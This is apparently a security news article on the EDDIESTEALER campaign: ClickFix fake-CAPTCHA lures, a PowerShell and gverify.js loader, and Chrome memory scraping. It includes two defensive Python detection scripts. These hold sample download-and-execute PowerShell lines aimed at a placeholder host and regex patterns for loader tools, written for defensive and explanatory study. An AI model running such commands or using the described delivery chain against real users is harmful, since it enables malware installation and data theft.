EDDIESTEALER Malware Bypasses Chrome’s Encryption to Steal Browser Data

New Malware Campaign: The Rise of EDDIESTEALER

A recent Elastic Security Labs report documents a campaign distributing a Rust-based information stealer called EDDIESTEALER. The lure is ClickFix, a social engineering technique built around fake CAPTCHA verification pages that talk the visitor into running a command on their own machine.

How the Attack Works

Elastic Security Labs researcher Jia Yu Chan has detailed the mechanics of the campaign. The attackers first compromise legitimate websites and embed malicious JavaScript in them. The compromised pages show a fake CAPTCHA verification prompt that asks the visitor to prove they are human by following a short set of instructions.

Victims are told to open the Windows Run dialog and paste a command that runs an obfuscated PowerShell script. The script retrieves the next-stage payload from an attacker-controlled server, the first link in a chain that ends with EDDIESTEALER installed on the system. Because the victim executes the command themselves, the page never needs to exploit a browser vulnerability.
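As an added example (not from Elastic's report or from this article) of the check a responder would run on a host suspected of a ClickFix infection: the Run dialog keeps a history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the pasted loader command is usually still there. The code below parses that key's layout and flags entries that look like a pasted one-liner. The registry layout described in the comments is standard Windows behaviour; the sample values, the example.invalid host and the indicator patterns are constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of the values under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows stores each Run-dialog entry as a single-letter value whose data is the
# command followed by a literal "\1"; MRUList lists those letters most-recent-first.
# The commands below are invented; example.invalid is a placeholder host.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iwr http://example.invalid/v | iex"\\1',
}

# Heuristics for a pasted ClickFix one-liner: PowerShell that hides its window or
# takes an encoded command, PowerShell that pulls and evaluates remote content, and
# other living-off-the-land download hosts. Tune these to your environment.
CLICKFIX_INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("powershell_hidden_or_encoded",
     re.compile(r"\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s)", re.I)),
    ("powershell_download_and_eval",
     re.compile(r"\bpowershell(\.exe)?\b.*(\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression)", re.I)),
    ("mshta_remote",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("curl_or_certutil_download",
     re.compile(r"\b(curl|certutil)(\.exe)?\b.*https?://", re.I)),
]


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (value_name, command) pairs most-recent-first, trailing "\\1" stripped."""
    parsed: List[Tuple[str, str]] = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue  # MRUList may still reference a value that was purged
        command = data[:-2] if data.endswith("\\1") else data
        parsed.append((letter, command))
    return parsed


def first_indicator(command: str) -> Optional[str]:
    """Name of the first indicator matching the command, or None."""
    for name, pattern in CLICKFIX_INDICATORS:
        if pattern.search(command):
            return name
    return None


def triage_runmru(values: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (value_name, command, indicator) for every suspicious Run-dialog entry."""
    hits: List[Tuple[str, str, str]] = []
    for letter, command in parse_runmru(values):
        indicator = first_indicator(command)
        if indicator is not None:
            hits.append((letter, command, indicator))
    return hits


if __name__ == "__main__":
    for letter, command, indicator in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU\\{letter}: [{indicator}] {command}")
```

On a live Windows host the same values can be read with `winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU")` and `winreg.EnumValue`, or from a collected NTUSER.DAT hive; the parser above only cares about the value names and data.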

The Payload Delivery Process

Once the PowerShell command runs, it saves a JavaScript file named gverify.js to the victim's Downloads folder. That script runs in a hidden window, fetches the EDDIESTEALER binary from the same server, and writes it to disk under a randomly generated 12-character filename.

EDDIESTEALER collects a wide range of data from the infected host and sends it to a command-and-control (C2) server. Targets include cryptocurrency wallets, web browsers, password managers, FTP clients and messaging applications.

Techniques Employed by the Malware

Elastic notes that EDDIESTEALER uses several techniques to hinder analysis and evade detection. Its strings are stored encrypted, Windows API functions are resolved at runtime through a custom lookup mechanism rather than a conventional import table, and a mutex ensures that only one instance of the malware runs at a time.

It also checks whether it is running in a sandboxed environment and, if it is, deletes itself from disk to reduce the chance of being analysed.

Handling Sensitive Data

The most notable feature of EDDIESTEALER is how it gets around Chromium's app-bound encryption, the protection Chrome added to tie cookie and credential decryption to a privileged service so that a process running as the user cannot simply decrypt the on-disk store. Rather than attacking the key, the malware uses a Rust port of ChromeKatz, an open-source tool that reads cookies and credentials directly from the memory of a running Chrome process, where they are necessarily held decrypted. If no suitable Chrome process is running, the malware spawns one itself, positioned off-screen so that the user never sees a window while the data is harvested.
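Detection logic for the chain described in the delivery section above and for the off-screen Chrome launch, as an added example (not Elastic's code or this article's): each stage leaves a process-creation event with a distinctive parent, and the full chain is the correlation of those stages through process lineage. The events are constructed Sysmon-style records; the PIDs, user name, file names and the example.invalid host are invented, the assumption that the script host itself starts the downloaded binary is mine, and the --window-position heuristic is an assumption since the page only says the window is placed off-screen.

```python
import re
from typing import Dict, Iterator, List, Tuple

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# PIDs, user name, file names and the download host are invented for the example;
# the off-screen window coordinates are an assumed value, not one taken from the report.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/gverify.js '
                '-OutFile $env:USERPROFILE\\Downloads\\gverify.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript C:\Users\alice\Downloads\gverify.js"},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\alice\Downloads\aB3kQ9xZ1mNp.exe",
     "cmdline": r"C:\Users\alice\Downloads\aB3kQ9xZ1mNp.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-3000,-3000'},
    # Benign control: the user opens Chrome from the shell as usual.
    {"pid": 600, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
PS_SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|\biex\b|invoke-expression"
    r"|\biwr\b|invoke-webrequest|downloadstring|https?://)", re.I)
JS_FROM_DOWNLOADS = re.compile(r'\\downloads\\[^\s"]+\.js\b', re.I)
RANDOM_STEM = re.compile(r"^[a-z0-9]{12}$", re.I)   # 12-character random filename
OFFSCREEN = re.compile(r"--window-position=\s*-\d+,-\d+")  # assumed heuristic


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_delivery_chain(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event matching a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}

    def ancestors(e: Dict) -> Iterator[Dict]:
        seen = set()
        p = by_pid.get(e["ppid"])
        while p is not None and p["pid"] not in seen:  # guard against PID-reuse loops
            seen.add(p["pid"])
            yield p
            p = by_pid.get(p["ppid"])

    hits: List[Tuple[str, int]] = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        late_stage = False

        # Stage 1: the Run dialog lives in explorer.exe, so the pasted one-liner
        # appears as PowerShell with explorer.exe as its parent.
        if img == "powershell.exe" and pimg == "explorer.exe" and PS_SUSPICIOUS.search(cmd):
            hits.append(("clickfix_powershell_from_run_dialog", e["pid"]))

        # Stage 2: a script host executing a .js file out of Downloads (gverify.js).
        if img in SCRIPT_HOSTS and JS_FROM_DOWNLOADS.search(cmd):
            hits.append(("script_host_js_from_downloads", e["pid"]))

        # Stage 3: a binary with a 12-character random name started from Downloads
        # by the script host (that the script host starts it is an assumption).
        if (pimg in SCRIPT_HOSTS and "\\downloads\\" in e["image"].lower()
                and RANDOM_STEM.match(img.rsplit(".", 1)[0])):
            hits.append(("random_named_binary_from_downloads", e["pid"]))
            late_stage = True

        # Stage 4: Chrome started by something other than the shell with an
        # off-screen window position, so the user never sees the window.
        if img == "chrome.exe" and pimg != "explorer.exe" and OFFSCREEN.search(cmd):
            hits.append(("offscreen_chrome_launch", e["pid"]))
            late_stage = True

        # Correlation: a late stage whose ancestry runs back through a script host
        # to PowerShell is the whole chain, not an isolated oddity.
        if late_stage:
            lineage = {basename(a["image"]) for a in ancestors(e)}
            if lineage & SCRIPT_HOSTS and "powershell.exe" in lineage:
                hits.append(("eddiestealer_delivery_chain", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect_delivery_chain(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
```

The per-stage rules are deliberately loose (a hidden PowerShell window or a script host in Downloads will fire on some legitimate automation); the lineage correlation is what turns them into a high-confidence alert, so it is the chain hit, not the individual stages, that should page someone.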

Recent Developments

Newer builds of EDDIESTEALER add functionality, such as collecting more detailed host information, including CPU and GPU details, and sending that profile to the C2 server up front, before any specific commands are executed.

The newer builds also encrypt communication with the server using a hardcoded key, which the researchers describe as reducing exposure of the C2 exchange. The caveat is that a key embedded in the binary can be recovered by anyone analysing a sample, so the encryption hides traffic from passive inspection rather than from a determined analyst.

Broader Impact

EDDIESTEALER arrived alongside a wave of new stealer families, including Katz Stealer and AppleProcessHub Stealer. Where EDDIESTEALER targets Windows, AppleProcessHub Stealer is built for macOS and harvests data such as GitHub configurations and iCloud Keychain entries.

Reporting on those families describes the same delivery pattern: obfuscated JavaScript files that launch PowerShell to install the malware on Windows and, for macOS targets, lures that have the user open Terminal and run a shell script that ultimately leads to data theft.

The common thread is that the victim, not an exploit, runs the first stage. Awareness of the fake-CAPTCHA pattern and telemetry on script interpreters launched from the Run dialog or from Downloads are the practical countermeasures for users and organisations.

Understanding how these attacks are executed, from the fake CAPTCHA through the hidden script to the off-screen browser, is what lets defenders spot them before the data leaves the host.
